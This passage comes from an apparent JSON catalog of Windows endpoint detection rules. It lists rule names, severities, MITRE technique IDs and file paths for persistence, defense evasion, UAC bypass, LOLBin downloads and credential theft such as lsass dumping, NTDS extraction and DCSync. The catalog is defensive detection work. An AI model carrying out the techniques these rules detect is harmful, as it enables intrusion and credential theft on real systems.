Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1547.001" ], "log_source": "windows", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-runonceex-write.yaml" }, { "id": "det-endpoint-048", "type": "detection", "name": "Image File Execution Options Debugger Set", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Image File Execution Options Debugger Set'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1546.012" ], "log_source": "windows", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-image-file-execution-options-debugger.yaml" }, { "id": "det-endpoint-049", "type": "detection", "name": "AppInit_DLLs Registry Value Modified", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'AppInit_DLLs Registry Value Modified'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1546.010" ], "log_source": "windows", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-appinit-dll-write.yaml" }, { "id": "det-endpoint-050", "type": "detection", "name": "Winlogon Userinit Registry Value Modified", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Winlogon Userinit Registry Value Modified'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1547.004" ], "log_source": "windows", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-winlogon-userinit-modified.yaml" }, { "id": "det-endpoint-051", "type": "detection", "name": "ScreenSaver Registry Path Set To Custom Binary", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'ScreenSaver Registry Path Set To Custom Binary'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1546.002" ], "log_source": "windows", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-screensaver-registry-binary.yaml" }, { "id": "det-endpoint-052", "type": "detection", "name": "HKLM BootExecute Registry Value Modified", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'HKLM BootExecute Registry Value Modified'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1547" ], "log_source": "windows", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-bootexecute-modified.yaml" }, { "id": "det-endpoint-053", "type": "detection", "name": "Startup Folder Written By Non-Installer Process", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Startup Folder Written By Non-Installer Process'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1547.001" ], "log_source": "windows", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-startup-folder-write.yaml" }, { "id": "det-endpoint-054", "type": "detection", "name": "Logon Script Registry Modified", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Logon Script Registry Modified'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1037.001" ], "log_source": "windows", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-logon-script-registry.yaml" }, { "id": "det-endpoint-055", "type": "detection", "name": "COM Hijack Via HKCR\\CLSID\\InprocServer32 Modification", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'COM Hijack Via HKCR\\CLSID\\InprocServer32 Modification'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1546.015" ], "log_source": "windows", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-com-hijack-classes-root.yaml" }, { "id": "det-endpoint-056", "type": "detection", "name": "Permanent WMI EventFilter Created", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Permanent WMI EventFilter Created'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1546.003" ], "log_source": "windows", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-wmi-eventfilter-create.yaml" }, { "id": "det-endpoint-057", "type": "detection", "name": "Permanent WMI EventConsumer Created", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Permanent WMI EventConsumer Created'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1546.003" ], "log_source": "windows", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-wmi-eventconsumer-create.yaml" }, { "id": "det-endpoint-058", "type": "detection", "name": "WMI Filter-To-Consumer Binding Created", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'WMI Filter-To-Consumer Binding Created'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1546.003" ], "log_source": "windows", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-wmi-binding-create.yaml" }, { "id": "det-endpoint-059", "type": "detection", "name": "Application Compatibility Shim Database Installed", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Application Compatibility Shim Database Installed'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1546.011" ], "log_source": "windows", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-shim-database-installed.yaml" }, { "id": "det-endpoint-060", "type": "detection", "name": "Print Monitor DLL Installed", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Print Monitor DLL Installed'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1547.010" ], "log_source": "windows", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-print-monitor-installed.yaml" }, { "id": "det-endpoint-061", "type": "detection", "name": "Microsoft Defender Disabled Via Registry", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Microsoft Defender Disabled Via Registry'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1562.001" ], "log_source": "windows", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-defender-disabled-via-registry.yaml" }, { "id": "det-endpoint-062", "type": "detection", "name": "Defender Real-Time Monitoring Disabled", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Defender Real-Time Monitoring Disabled'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1562.001" ], "log_source": "windows", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-defender-realtime-monitoring-off.yaml" }, { "id": "det-endpoint-063", "type": "detection", "name": "Microsoft Defender Path Exclusion Added", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Microsoft Defender Path Exclusion Added'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1562.001" ], "log_source": "windows", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-defender-exclusion-added.yaml" }, { "id": "det-endpoint-064", "type": "detection", "name": "AMSI Provider DLL Loaded From User Path", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'AMSI Provider DLL Loaded From User Path'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1562.001" ], "log_source": "windows", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-amsi-provider-loaded.yaml" }, { "id": "det-endpoint-065", "type": "detection", "name": "ETW Disabled Via Registry", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'ETW Disabled Via Registry'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1562.006" ], "log_source": "windows", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-etw-tampering-via-registry.yaml" }, { "id": "det-endpoint-066", "type": "detection", "name": "Windows Event Log Service Stopped", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Windows Event Log Service Stopped'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1562.001" ], "log_source": "windows", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-eventlog-service-stopped.yaml" }, { "id": "det-endpoint-067", "type": "detection", "name": "Windows Application Event Log Cleared", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Windows Application Event Log Cleared'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1070.001" ], "log_source": "windows", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-application-log-cleared.yaml" }, { "id": "det-endpoint-068", "type": "detection", "name": "Windows System Event Log Cleared", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Windows System Event Log Cleared'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1070.001" ], "log_source": "windows", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-system-log-cleared.yaml" }, { "id": "det-endpoint-069", "type": "detection", "name": "Sysmon Configuration Changed", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Sysmon Configuration Changed'. Watch the 2 documented false-positive cases before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1562.001" ], "log_source": "windows", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-sysmon-config-changed.yaml" }, { "id": "det-endpoint-070", "type": "detection", "name": "UAC Bypass Via fodhelper.exe", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'UAC Bypass Via fodhelper.exe'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1548.002" ], "log_source": "windows", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-uac-bypass-fodhelper.yaml" }, { "id": "det-endpoint-071", "type": "detection", "name": "UAC Bypass Via eventvwr.exe", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'UAC Bypass Via eventvwr.exe'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1548.002" ], "log_source": "windows", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-uac-bypass-eventvwr.yaml" }, { "id": "det-endpoint-072", "type": "detection", "name": "UAC Bypass Via sdclt.exe", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'UAC Bypass Via sdclt.exe'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1548.002" ], "log_source": "windows", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-uac-bypass-sdclt.yaml" }, { "id": "det-endpoint-073", "type": "detection", "name": "AlwaysInstallElevated Registry Enabled", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'AlwaysInstallElevated Registry Enabled'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1548.002" ], "log_source": "windows", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-always-install-elevated.yaml" }, { "id": "det-endpoint-074", "type": "detection", "name": "bcdedit Used To Disable Recovery", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'bcdedit Used To Disable Recovery'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1490" ], "log_source": "windows", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-bcdedit-recovery-disabled.yaml" }, { "id": "det-endpoint-075", "type": "detection", "name": "vssadmin Used To Enumerate And Delete Shadow Copies", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'vssadmin Used To Enumerate And Delete Shadow Copies'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1490" ], "log_source": "windows", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-vssadmin-list-shadows-then-delete.yaml" }, { "id": "det-endpoint-076", "type": "detection", "name": "PowerShell Invoke-Expression On Web Download", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'PowerShell Invoke-Expression On Web Download'. Watch the 2 documented false-positive cases before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1059.001" ], "log_source": "windows", "playbook": "tpl-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-powershell-iex-from-web.yaml" }, { "id": "det-endpoint-077", "type": "detection", "name": "PowerShell Run With ExecutionPolicy Bypass", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'PowerShell Run With ExecutionPolicy Bypass'. 
Watch the 2 documented false-positive cases before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1059.001" ], "log_source": "windows", "playbook": "tpl-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-powershell-bypass-flag.yaml" }, { "id": "det-endpoint-078", "type": "detection", "name": "PowerShell Command Line Contains AMSI Bypass String", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'PowerShell Command Line Contains AMSI Bypass String'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1562.001", "T1059.001" ], "log_source": "windows", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-powershell-amsi-bypass-string.yaml" }, { "id": "det-endpoint-079", "type": "detection", "name": "mshta.exe Executed Inline Script", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'mshta.exe Executed Inline Script'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1218.005" ], "log_source": "windows", "playbook": "tpl-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-mshta-running-script.yaml" }, { "id": "det-endpoint-080", "type": "detection", "name": "rundll32.exe Loaded DLL From Temp Path", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'rundll32.exe Loaded DLL From Temp Path'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1218.011" ], "log_source": "windows", "playbook": "tpl-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-rundll32-from-temp.yaml" }, { "id": "det-endpoint-081", "type": "detection", "name": "rundll32.exe Started Without Arguments", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'rundll32.exe Started Without Arguments'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1218.011" ], "log_source": "windows", "playbook": "tpl-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-rundll32-no-args.yaml" }, { "id": "det-endpoint-082", "type": "detection", "name": "regsvr32.exe Used With scrobj.dll (Squiblydoo)", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'regsvr32.exe Used With scrobj.dll (Squiblydoo)'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1218.010" ], "log_source": "windows", "playbook": "tpl-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-regsvr32-scrobj.yaml" }, { "id": "det-endpoint-083", "type": "detection", "name": "wmic process call create Used For Remote Execution", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'wmic process call create Used For Remote Execution'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1047" ], "log_source": "windows", "playbook": "tpl-lateral-movement", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-wmic-process-call-create-remote.yaml" }, { "id": "det-endpoint-084", "type": "detection", "name": "cscript.exe Executing Script From Temp", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'cscript.exe Executing Script From Temp'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1059.005" ], "log_source": "windows", "playbook": "tpl-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-cscript-from-temp.yaml" }, { "id": "det-endpoint-085", "type": "detection", "name": "bitsadmin.exe Downloading File", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'bitsadmin.exe Downloading File'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1197" ], "log_source": "windows", "playbook": "tpl-command-and-control", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-bitsadmin-download.yaml" }, { "id": "det-endpoint-086", "type": "detection", "name": "certutil.exe Used To Decode Encoded File", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'certutil.exe Used To Decode Encoded File'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1140" ], "log_source": "windows", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-certutil-decode.yaml" }, { "id": "det-endpoint-087", "type": "detection", "name": "certutil.exe Used To Download Remote File", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'certutil.exe Used To Download Remote File'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1105" ], "log_source": "windows", "playbook": "tpl-command-and-control", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-certutil-download-url.yaml" }, { "id": "det-endpoint-088", "type": "detection", "name": "cmstp.exe Loaded INF From Suspicious Path", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'cmstp.exe Loaded INF From Suspicious Path'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1218.003" ], "log_source": "windows", "playbook": "tpl-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-cmstp-load-untrusted-inf.yaml" }, { "id": "det-endpoint-089", "type": "detection", "name": "InstallUtil.exe Run From Temp Path", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'InstallUtil.exe Run From Temp Path'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1218.004" ], "log_source": "windows", "playbook": "tpl-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-installutil-from-temp.yaml" }, { "id": "det-endpoint-090", "type": "detection", "name": "MSBuild Running Inline Task XML From User Path", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'MSBuild Running Inline Task XML From User Path'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1127.001" ], "log_source": "windows", "playbook": "tpl-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-msbuild-running-inline-task.yaml" }, { "id": "det-endpoint-091", "type": "detection", "name": "ProcDump Used Against lsass.exe", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'ProcDump Used Against lsass.exe'. Watch the 2 documented false-positive cases before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1003.001" ], "log_source": "windows", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-procdump-lsass.yaml" }, { "id": "det-endpoint-092", "type": "detection", "name": "comsvcs.dll MiniDump Of lsass", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'comsvcs.dll MiniDump Of lsass'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1003.001" ], "log_source": "windows", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-comsvcs-minidump.yaml" }, { "id": "det-endpoint-093", "type": "detection", "name": "Mimikatz Marker String In Process Command Line", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Mimikatz Marker String In Process Command Line'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1003" ], "log_source": "windows", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-mimikatz-strings-on-cli.yaml" }, { "id": "det-endpoint-094", "type": "detection", "name": "ntdsutil.exe Used To Extract NTDS", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'ntdsutil.exe Used To Extract NTDS'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1003.003" ], "log_source": "windows", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-ntds-extract-ntdsutil.yaml" }, { "id": "det-endpoint-095", "type": "detection", "name": "VSS Shadow Created Then NTDS.dit Copied", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'VSS Shadow Created Then NTDS.dit Copied'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1003.003" ], "log_source": "windows", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-vss-shadow-then-copy-ntds.yaml" }, { "id": "det-endpoint-096", "type": "detection", "name": "Impacket secretsdump.py Pattern Detected", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Impacket secretsdump.py Pattern Detected'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1003" ], "log_source": "windows", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-secretsdump-impacket.yaml" }, { "id": "det-endpoint-097", "type": "detection", "name": "reg save Used Against SAM/SECURITY/SYSTEM", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'reg save Used Against SAM/SECURITY/SYSTEM'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1003.002" ], "log_source": "windows", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-reg-save-sam.yaml" }, { "id": "det-endpoint-098", "type": "detection", "name": "vaultcmd.exe Listed All Stored Credentials", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'vaultcmd.exe Listed All Stored Credentials'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1555.004" ], "log_source": "windows", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-credential-manager-vault-dump.yaml" }, { "id": "det-endpoint-099", "type": "detection", "name": "DPAPI Master Key File Read From Roaming Dir", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'DPAPI Master Key File Read From Roaming Dir'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1555.003" ], "log_source": "windows", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-dpapi-masterkey-access.yaml" }, { "id": "det-endpoint-100", "type": "detection", "name": "Chromium Login Data SQLite File Read", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Chromium Login Data SQLite File Read'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1555.003" ], "log_source": "windows", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-browser-credential-file-read.yaml" }, { "id": "det-endpoint-101", "type": "detection", "name": "DCSync Replication Right Used By Non-DC Account", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'DCSync Replication Right Used By Non-DC Account'. 
